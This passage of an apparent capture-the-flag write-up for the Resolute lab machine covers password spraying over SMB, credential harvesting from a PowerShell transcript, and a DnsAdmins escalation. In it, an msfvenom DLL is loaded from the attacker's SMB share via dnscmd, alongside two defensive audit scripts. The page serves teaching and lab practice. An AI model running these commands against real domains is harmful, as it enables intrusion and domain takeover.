index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: <span class="o">(</span>null<span class="o">)</span> Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: <span class="o">(</span>null<span class="o">)</span> Desc: Built-in account <span class="k">for </span>guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: <span class="o">(</span>null<span class="o">)</span> Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password <span class="nb">set </span>to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
</code></pre></div></div>
<p>enum4linux generates a lot of information. Under <code class="language-plaintext highlighter-rouge">Users</code> we find an interesting description for the user Marko:</p>
<blockquote>
<p>Desc: Account created. Password set to Welcome123!</p>
</blockquote>
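<p>As an added example (not part of the original write-up), the following Python audit script parses enum4linux’s user listing, decodes the <code class="language-plaintext highlighter-rouge">acb</code> account-control bits and flags descriptions that look like they contain a credential. It goes slightly beyond the Marko case above by also reporting enabled accounts whose passwords never expire or are not required; the sample lines are copied from the output above.</p>

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# SAMR account-control bits (the "acb" column) as enum4linux/rpcclient print them.
ACB_FLAGS = {
    0x0001: "DISABLED",
    0x0002: "HOMEDIR_REQUIRED",
    0x0004: "PASSWORD_NOT_REQUIRED",
    0x0008: "TEMP_DUPLICATE",
    0x0010: "NORMAL_ACCOUNT",
    0x0020: "MNS_LOGON",
    0x0040: "INTERDOMAIN_TRUST",
    0x0080: "WORKSTATION_TRUST",
    0x0100: "SERVER_TRUST",
    0x0200: "PASSWORD_NEVER_EXPIRES",
    0x0400: "AUTO_LOCKED",
}

# One "index: ... RID: ... acb: ... Account: ... Name: ... Desc: ..." line.
USER_LINE_RE = re.compile(
    r"index:\s+0x[0-9a-fA-F]+\s+RID:\s+(?P<rid>0x[0-9a-fA-F]+)\s+acb:\s+(?P<acb>0x[0-9a-fA-F]+)\s+"
    r"Account:\s+(?P<account>\S+)\s+Name:\s+(?P<name>.*?)\s+Desc:\s+(?P<desc>.*)$"
)

# Words in a description field that suggest somebody wrote a credential into the directory.
SECRET_WORDS_RE = re.compile(r"\b(password|passwd|pwd|pass|creds?)\b", re.IGNORECASE)


@dataclass
class Account:
    rid: int
    account: str
    name: str
    desc: str
    acb: int

    def flags(self) -> list[str]:
        """Decode the acb bitmask into human-readable flag names."""
        return [label for bit, label in ACB_FLAGS.items() if self.acb & bit]


def parse_enum4linux_users(text: str) -> list[Account]:
    """Extract the user records from enum4linux's 'Users on <host>' section."""
    accounts: list[Account] = []
    for line in text.splitlines():
        m = USER_LINE_RE.search(line)
        if m:
            accounts.append(Account(int(m["rid"], 16), m["account"], m["name"],
                                    m["desc"].strip(), int(m["acb"], 16)))
    return accounts


def audit(accounts: list[Account]) -> list[tuple[str, str]]:
    """Return (account, reason) pairs for the hygiene problems a defender should fix."""
    findings: list[tuple[str, str]] = []
    for a in accounts:
        flags = a.flags()
        enabled = "DISABLED" not in flags
        if a.desc != "(null)" and SECRET_WORDS_RE.search(a.desc):
            findings.append((a.account, f"description may contain a credential: {a.desc!r}"))
        if enabled and "PASSWORD_NEVER_EXPIRES" in flags:
            findings.append((a.account, "enabled account whose password never expires"))
        if enabled and "PASSWORD_NOT_REQUIRED" in flags:
            findings.append((a.account, "enabled account that does not require a password"))
    return findings


# Sample input: five lines copied from the enum4linux output above.
SAMPLE_USERS = """\
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
"""

if __name__ == "__main__":
    for account, reason in audit(parse_enum4linux_users(SAMPLE_USERS)):
        print(f"{account}: {reason}")
```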
<p>If we try logging into the SMB service as Marko it fails. We can assume that Welcome123! is used as a default password by a lazy admin, so let’s try it against all of the users. An easy way to do this is the auxiliary/scanner/smb/smb_login module in Metasploit.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf5 <span class="o">></span> use auxiliary/scanner/smb/smb_login
<span class="o">[</span><span class="k">*</span><span class="o">]</span> 10.10.10.169:445 - 10.10.10.169:445 - Starting SMB login bruteforce
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\userlist::Welcome123!'</span>,
<span class="o">[!]</span> 10.10.10.169:445 - No active DB <span class="nt">--</span> Credential data will not be saved!
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\Administrator:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\Guest:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\krbtgt:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\DefaultAccount:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\ryan:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\marko:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\sunita:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\abigail:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\marcus:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\sally:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\fred:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\angela:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\felicia:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\gustavo:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\ulf:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\stevie:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\claire:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\paulo:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\steve:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\annette:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\annika:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\per:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\claude:Welcome123!'</span>,
<span class="o">[</span>+] 10.10.10.169:445 - 10.10.10.169:445 - Success: <span class="s1">'megabank\melanie:Welcome123!'</span>
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\zach:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\simon:Welcome123!'</span>,
<span class="o">[</span>-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: <span class="s1">'megabank\naoki:Welcome123!'</span>,
<span class="o">[</span><span class="k">*</span><span class="o">]</span> 10.10.10.169:445 - Scanned 1 of 1 hosts <span class="o">(</span>100% <span class="nb">complete</span><span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Auxiliary module execution completed
</code></pre></div></div>
<p>We get a hit! The user Melanie is using the default password.</p>
<p>We can now use ldapdomaindump as an authenticated user to learn more about the system.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>❯ ldapdomaindump <span class="nt">-u</span> megabank<span class="se">\m</span>elanie 10.10.10.169
Password:
<span class="o">[]</span> Connecting to host...
<span class="o">[]</span> Binding to host
<span class="o">[</span>+] Bind OK
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Starting domain dump
<span class="o">[</span>+] Domain dump finished
</code></pre></div></div>
<p>This outputs a number of files; the USER file gives us more information about the users and which groups they are members of.
Melanie is in the Remote Management Users group, which means we should be able to use evil-winrm to log in as Melanie. Also of interest is the user ryan, who is a member of the Contractors group, which is in turn a member of DnsAdmins and Remote Management Users.</p>
<p>Let’s log in as Melanie.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>evil-winrm <span class="nt">-i</span> 10.10.10.169 <span class="nt">-u</span> melanie <span class="nt">-p</span> Welcome123!
</code></pre></div></div>
<p>Navigate to C:\Users\Melanie\Desktop\user.txt for the user flag.</p>
<h3 id="privesc">PrivEsc</h3>
<p>I tried running winPEAS but this didn’t return anything useful.
After looking around the filesystem I eventually found a hidden directory, C:\PSTranscripts.
To see hidden files in PowerShell use:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ChildItem <span class="nt">-Force</span>
</code></pre></div></div>
<p>In this directory there is a log file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
</code></pre></div></div>
<p>A number of lines contain the password Serv3r4Admin4cc123! associated with the ryan user account.
We already know from ldapdomaindump that ryan is a member of Remote Management Users, so let’s log in as ryan.
We also know that ryan is a member of DnsAdmins, meaning that ryan has access to the dnscmd command. We can use this to get root access by injecting a malicious dns.dll.</p>
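<p>Transcription logging is valuable, but as the log above shows it also captures any secret typed on a command line. As an added example (not part of the original write-up), the following Python scanner walks a PowerShell transcript, attributes each command to the account named in the preceding header and reports <code class="language-plaintext highlighter-rouge">net use</code> commands that carry an inline password, keeping only the length of the secret. The sample is an excerpt of the transcript above plus one constructed line in the documented <code class="language-plaintext highlighter-rouge">&lt;password&gt; /user:</code> form.</p>

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Transcript header line naming the account the following commands ran as.
USERNAME_RE = re.compile(r"^Username:\s+(?P<user>\S+)\s*$")
# "net use" anywhere in a line (Invoke-Expression parameter, prompt echo or error echo).
NET_USE_RE = re.compile(r"\bnet(?:\.exe)?\s+use\b(?P<args>.*)$", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    run_as: str        # account from the nearest preceding transcript header
    share: str         # UNC path the credential was supplied for
    user: str | None   # /user: value, or the first positional token in the variant above
    secret_len: int    # length of the suspected password; the value itself is not retained
    line_no: int       # first transcript line where this credential appeared


def parse_net_use(args: str) -> tuple[str | None, str | None, str | None]:
    r"""Return (share, user, password) from the argument tail of a net use command.

    Handles the documented form  net use X: \\srv\share <password> /user:<name>
    and the positional variant from the transcript above:  ... <user> <password>.
    """
    share = user = password = None
    positional: list[str] = []
    for tok in args.split():
        if tok.lower().startswith("/user:"):
            user = tok[len("/user:"):]
        elif tok.startswith("/") or re.fullmatch(r"[A-Za-z]:|\*", tok):
            continue  # other switches and the drive letter carry no credential
        elif tok.startswith("\\\\") and share is None:
            share = tok
        else:
            positional.append(tok)
    if share is None:
        return None, None, None
    if user is not None:
        password = positional[0] if positional else None
    elif len(positional) >= 2:
        user, password = positional[0], positional[1]
    elif positional:
        password = positional[0]
    return share, user, password


def scan_transcript(text: str) -> list[Finding]:
    """Walk a PowerShell transcript and report each inline net use credential once."""
    seen: dict[tuple, Finding] = {}
    run_as = "<unknown>"
    for no, line in enumerate(text.splitlines(), 1):
        header = USERNAME_RE.match(line)
        if header:
            run_as = header["user"]
            continue
        m = NET_USE_RE.search(line)
        if not m:
            continue
        share, user, password = parse_net_use(m["args"])
        if share and password:
            key = (run_as, share, user, len(password))  # error echoes repeat the command
            seen.setdefault(key, Finding(run_as, share, user, len(password), no))
    return sorted(seen.values(), key=lambda f: f.line_no)


# Sample input: excerpt of the transcript above; the final "PS>cmd /c net use Z: ..." line is constructed.
SAMPLE_TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
**********************
Command start time: 20191203063600
**********************
PS>cmd /c net use Z: \\fs01\backups Summer2019 /user:MEGABANK\svc_backup
"""

if __name__ == "__main__":
    for f in scan_transcript(SAMPLE_TRANSCRIPT):
        print(f"line {f.line_no}: {f.run_as} supplied a {f.secret_len}-char password for "
              f"{f.user} on {f.share}")
```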
<p>Our dns.dll file will be run with admin privileges, so we could use a reverse shell; however, I found that this was not stable, perhaps due to Windows Defender. Another option is to add a user to the Domain Admins group.
So let’s use msfvenom to craft a malicious dns.dll that will add melanie to Domain Admins.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfvenom <span class="nt">-p</span> windows/x64/exec <span class="nv">CMD</span><span class="o">=</span><span class="s1">'net group "domain admins" melanie /add /domain'</span> <span class="nt">-f</span> dll <span class="o">></span> dns.dll
</code></pre></div></div>
<p>Windows Defender removes the file if you transfer it to the local machine, so we will have to host it on an SMB share.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>smbserver.py <span class="nt">-debug</span> smb ./
</code></pre></div></div>
<p>Now, as ryan, we can run the following command to point the serverlevelplugindll setting at our malicious file.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dnscmd RESOLUTE /config /serverlevelplugindll <span class="se">\\</span>10.10.14.35<span class="se">\\</span>smb<span class="se">\\</span>dns.dll
</code></pre></div></div>
<p>Then we must restart the DNS service for our code to run.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sc.exe stop dns
sc.exe start dns
</code></pre></div></div>
<p>If all has gone well, melanie should now be a member of the Domain Admins group. If we log back in as melanie we can read the root.txt flag.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>melanie: cat C:/Users/Administrator/Desktop/root.txt
</code></pre></div></div>John McEwanLets start by running nmap. There is no website running on port 80, this machine is going to be entirely Active Directory.